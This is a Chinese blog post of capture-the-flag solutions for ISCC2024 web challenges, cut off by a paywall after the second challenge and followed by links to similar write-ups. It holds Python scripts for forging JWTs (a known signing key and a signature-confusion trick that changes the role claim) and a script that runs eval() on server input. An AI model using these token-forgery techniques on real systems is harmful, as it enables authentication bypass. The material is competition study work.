ISCC2024 Web部分题解

已于 2024-08-03 12:34:42 修改
阅读量2.5k 收藏 38
点赞数 52
文章标签: 网络安全 web安全
于 2024-08-01 15:22:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75627590/article/details/140846636
版权

目录

Web1 还没想好名字的塔防游戏

Web2 Flask中的pin值计算

Web3 代码审计

Web4 原神启动

Web5 掉进阿帕奇的工资

Web6 这题我出不了了

Web7 回来吧永远滴神

Web1 还没想好名字的塔防游戏

1.打开靶机获取一个游戏

 2.先尝试玩几把游戏得到弹窗提示信息

3.根据弹窗提示全局搜索alert找源码,可以找到三条提示信息 

Owls Sketch Shadows
Crystal Rivers Sing
Griffins Guard Galaxies
OSSCRSGGG

4.在网页里看到

Mystic Defense War: The Secret of Guardian Towers and Magical Monsters

同样获取大写字母,组合起来就是Flag

ISCC{MDWTSGTMMOSSCRSGGG}

Web2 Flask中的pin值计算

1.打开靶机获取提示信息

2.Ctrl+u查看源码发现base64的编码的字符串,解码得到路径/getusername;

3.访问/getusername进入以下页面,通过不断的尝试最终发现输入“告诉我username“就可以拿到username值为:pincalculate

4.通过不断的测试,输入app之后会再给我们一个提示访问/crawler,出现了一个需要在1秒内计算的公式,使用脚本计算获取路径信息

5.查看网络请求可以发现,页面所需要计算的值是由/get_expression接口传过来的,那么就可以编写脚本来计算,观察experssion发现要对python运算符进行替换

import json 
import requests 
text = requests.get("http://101.200.138.180:10006/get_expression").text 
# 解析JSON字符串 
data = json.loads(text) 
 
# 提取表达式 
expression = data["expression"] 
​
# 将乘号和除号替换为Python的运算符 
expression = expression.replace("\u00d7", "*") 
expression = expression.replace("\u00f7", "/") 
​
# 计算表达式的值 
result = eval(expression) 
 
# 打印结果 
text = requests.get("http://101.200.138.180:10006/crawler?answer="+str(result)).text 
print(text)

输出: 

/usr/local/lib/python3.11/site-packages/flask/app.py
uuidnode_mac位于/woddenfish

即获取到app.py绝对路径:/usr/local/lib/python3.11/site-packages/flask/app.py

6.访问接口/woddenfish,无论点击“敲击”多少次一直显示功德不足,查看一下源码拿到jwt,对jwt进行解密。

7.将解密后的donate换成gongde,然后quantity设置一个极大的值,根据源码得知jwt的key是ISCC_muyu_2024

8.用burpsuite抓包,替换Session后重放包得到响应,得到MAC 地址是: 02:42:ac:18:00:02,转换成十进制为2485378351106,下一步提示为/machine_id

“Session”:“eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiZ29uZ2RlIiwicXVhbnRpdHkiOjEwMDAwMDAwMDAwMDAwMDAwfQ.n8_a10iVQh-pjbR7vs-kTGcTinX79xPTZTC5zlazHAU”

9.我们继续输入 /machine_id跟进分析,点击VIP会员奖品拿到一个jwt,点SUPERVIP会员奖品无法获取

10.解jwt得:

11.伪造jwt,修改role

from json import loads, dumps
from jwcrypto.common import base64url_encode, base64url_decode
 
def topic(topic):
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    print(parsed_payload)
    parsed_payload["role"] = "vip"
    print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
    print(fake_payload)
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '
 
print(topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ2NDQ3NjAsImlhdCI6MTcxNDY0MTE2MCwianRpIjoiUXpuLU1NN3djRjFzLVh4NlF2V3V0USIsIm5iZiI6MTcxNDY0MTE2MCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.ll_ExDrBzG-hU18i9yCZe6ALPAe0xFXbra6YbKxOWL5r8XBLDrBUxKTdDinDIxFVU6v69UhHmPrQYvKt0iwaxMDxX71h6XWk5PP0DiSc-IcPol-jJjOdDzjJosyEUzeTkxgD_8T55Y3AbPCligDkBq7HhBuz7yAzWRPZTJpXmfo_CVNdpmCSbriQ_FCYqVScwUZZe6RtD63Pqv_ge5RDWBrx4Lb-DDXLyxdwkibJCbr8A35uNLwv2Vlvx9MhcZANEZG3IrilQRh2n55w74gEyCxIhmXDcfRFSQLMupduP9RcRIAllqKKdXzxq97e0ERp8SnlaZA-W0co8lpAfNVPwA'))

最低0.47元/天 解锁文章
Doris Chan
关注
2022年中职组网络安全山东省省赛库后门安装与渗透目解析
qq_57147160的博客
03-01 6895
B-2任务二:Rootkit后门的利用任务环境说明:●服务器场景:Server2(封闭靶机)●服务器场景操作系统:未知 通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描11/25渗透测试,并将该操作显示结果中SSH服务版本信息字符串作为FLAG提交; 2.通过本地PC中渗透测试平台Kali对服务器场景进行SSH暴力破解,将破解成功的密码作为FLAG提交;(用户名:root,字典文件/usr/share/wordlists/dirb/small.txt) 3
ISCC2014 Web网络安全)Writeup
RickGray
06-15 3281
吐槽一下:整个ISCC2014的Web关都充斥
ISCC-2024--WP
weixin_65279640的博客
08-20 1021
打开目,有提示是进入页面,查看源代码,发现还有三条提示然后看到主页面中有游戏名字,跟目名称还没有想好名字的塔防游戏相冲突,因此我们可以判断其为一条信息之后根据目提示xxx为18位,我们去找这几条信息的特征,发现每句话的大写字母刚好可以组成十八位。加上ISCC{}几位正确答案。打开之后我们发现是代码为了更方便产看信息。我们右键-》查看页面源代码,看到是使用python写的后端代码,之后我们进行代码审计。源码。
ISCCWeb——WP
weixin_30699831的博客
05-08 808
比赛已经结束了,自己做出来的也不是很多,跟大家分享一下 第一:比较数字大小 打开连接 在里面随意输入一个值,他会提示数字太小了 那么我们输入他允许的最大值试试 他还是提示太小了 我们知道做web‘最先看的就是F12打开源码 在源码里我们可以看到框内设置的最长字段是3 那么我们改大,再在框内输入远大于三位数的数字提交就会看到flag了 第二:we...
ISCC 2023 练武 web 所有
热门推荐
m0_64425190的博客
06-03 1万+
ChatGGG ISCC内部零元购-2 ISCC单身节抽奖 ISCC疯狂购物节-1 Where_is_your_love 上大号说话 小周的密码锁 羊了个羊 老狼老狼几点了
ISCC web复现
m0_62422842的博客
06-05 1756
第一次参加ISCC线上赛,感觉目质量还是挺好的,擂台赛都是大佬们的主场,向我这样的小白也只能学学新东西。在此总结做过的web目以及相关知识点。
ISCCweb)
记录个人日常所学所思
05-22 596
web4 地址: <?php error_reporting(0); include("flag.php"); $hashed_key = 'ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a'; $parsed = parse_url($_SERVER['REQUEST_URI']); /*理解p...
2016 ISCC CTF 比赛 WEB类第一
aj_shang的博客
06-06 3608
网站链接:http://101.200.145.44/web1/index.php.txt 当点击这里之后,后出现下图 1.点击source,出现源码,发现user==flag 2.注入sql语句 $sql = "select user from user where pw= ' $pass ' " 在密码栏中输入的值是$pass,将其替换为' or us
ISCC web4
A_dmin的博客
05-08 1947
ISCC web4 打开网页看到: 代码审计。。。。。。。。。 一开始以为是sha256解密,结果半天搞不出来 后来才知道parse_url函数存在变量覆盖漏洞 因为要存在action参数,传入action=auth key也要传入key=0 由于key是要被sha256加密的 传入一个hashed_key,将原来的密文个覆盖掉 这个参数传入的是我们传入的key经过sha256加密后的密文,也...
ISCC2021——web部分
ki10Moc的博客
05-26 1417
ISCC客服冲冲冲(一) 该目需要左边的客服票数高于右边的 我会的就两种方法,毕竟是废物,允许 1、 把左右按钮换一下 然后就 2、在控制台输入 回车,走你 你涨啊,涨啊,接着涨啊…没吃饭吗 这是啥 发现一堆这 Jsfuck解密。 Web01 太明显了 robots协议 和攻防世界如出一辙,不让访问那就访问 得到源码 <?php <p>code.txt</p> if (isset ($_GET['password'])) { if (p
ISCC2024个人挑战赛WP-WEB
qq_59468567的博客
05-26 1288
(非官方解,以下内容均互联网收集的信息和个人思路,仅供学习参考) GET /world.js HTTP/1.1Host: 101.200.138.180:17345Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateA
ISCC2021 Web WP
Atkx's Blog
05-27 2114
目录WebISCC客服冲冲冲(一)这是啥Web01登录which is the true isccMISCRetrieve the passcode海市蜃楼-1 Web ISCC客服冲冲冲(一) 又到了一年一度的ISCC,客服一号为了保住饭碗(被迫)参与了今年的客服海选投票。经过激烈的角逐,客服一号终于凭借着自己多年的客服经验来到决赛的舞台,却发现对手竟是自己??? 请帮助真正的客服一号在投票中取胜,保住客服一号的饭碗! 目入口:http://39.96.91.106:7020 这是啥 这是什么东西呢?
ISCC2020-Web题解
Lemon's blog
05-27 2267
神秘组织的邮件-2 点击提交数字会发生改变,因为这次的赛制有一个关联,通过上一 得出的flag是加键乘除,又提示要联系起来,就想起了之前做有一道秋名山车神那道,只不过这个需要将运算符手动添加,脚本如下: import requests from bs4 import BeautifulSoup import re import time if __name__ == '__main__': time_start=time.time() url = 'http://101.201.126
iscc2019 web+misc题解
weixin_44255856的博客
06-05 1135
2019-05-07 ISCC 2019 (一) Web web 1 代码审计 判断value,其值不能在32和127之间,否则销毁 chr函数在转换时会自动取模256,所以我们只需要在原本ascii码基础上+256即可(即十进制ASCII码加上256还是等于原数) intval()在处理16进制时存在问,但强制转换时时正常的. payload : value[0]=375&val...
ctf赛secret.php,记一场纯JS赛——DiceCTF2021 Web题解
weixin_42509398的博客
03-12 872
// remake the `users` tabledb.exec( `DROP TABLE IF EXISTS users;`);db.exec( `CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT);`);// add an admin user with a random ...
ISCC2020练武Web总结
qwzf
06-06 3049
前言 接下来,继续总结练武Web Web MISC
ISCC2024-Pwn-chaos
最新发布
m0_64764890的博客
09-07 466
1.对附件进行逆向分析,发现调用free(ptr)之后并没有将ptr的值设置为NULL,导致ptr在下次使用中仍然指向现在分配的地址,输入时可以将v1的值输入为104,因此当用户输入的值为0x68(即10进制的104)时v3与ptr之前分配的内容重合,申请后ptr指向的区域与v3重合。2.在虚拟机上尝试这一步操作,执行完该步操作后成功进入主机,并获取到flag。
CISCN2024-Web方向题解
Err0r233的博客
05-21 2570
被CISCN打烂了,几个都是差一点就出,自己还是太菜了。
2021ISCC 部分web writeup
鸣蜩十四的博客
05-30 370
ISCC客服冲冲冲(一) 在这道目中让左边的票数超过右边的票数,我第一反应是写一个脚本刷票,而且看起来没有限制ip多次投票,所以写了一个比较简单的python自动点击投票 from selenium import webdriver driver = webdriver.Chrome("C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe") driver.get("http://39.96.91.106:7020/test
ISCC2024计算flask的pin值
05-03
ISCC2024是一种用于对数字内容进行哈希的算法,它可以生成一个固定长度的哈希值。而pin值是一个与硬件相关的特殊值,用于保证运行在特定硬件上的程序不被恶意修改或运行在未授权的硬件上。 由于ISCC2024是一种数字哈希算法,与flask框架和pin值并没有直接的关联。如果您需要计算flask的pin值,可能需要考虑其他方法。可以提供更具体的信息,以便我更好地回答您的问
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值